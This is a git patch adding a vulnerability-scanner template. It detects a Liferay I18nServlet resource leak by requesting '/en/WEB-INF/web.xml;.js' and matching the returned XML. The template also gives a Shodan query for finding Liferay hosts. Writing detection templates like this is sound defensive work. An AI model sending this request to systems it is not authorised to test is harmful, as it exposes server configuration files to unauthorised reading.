From 1d1b95fd89718d64c3fe7895f951853a0b198b39 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 7 Aug 2022 23:05:09 +0530
Subject: [PATCH] Create liferay-resource-leak.yaml

---
 misconfiguration/liferay-resource-leak.yaml | 36 +++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 misconfiguration/liferay-resource-leak.yaml

diff --git a/misconfiguration/liferay-resource-leak.yaml b/misconfiguration/liferay-resource-leak.yaml
new file mode 100644
index 0000000000..7bc714529c
--- /dev/null
+++ b/misconfiguration/liferay-resource-leak.yaml
@@ -0,0 +1,36 @@
+id: liferay-resource-leak
+
+info:
+  name: Liferay - Resource leakage through I18nServlet
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works).
+  remediation: Update Liferay to the latest version
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
+  metadata:
+    verified: true
+    shodan-query: title:"Liferay"
+  tags: liferay,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/en/WEB-INF/web.xml;.js"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "<web-app id"
+        part: body
+
+      - type: word
+        words:
+          - "application/xml"
+        part: header
+
+      - type: status
+        status:
+          - 200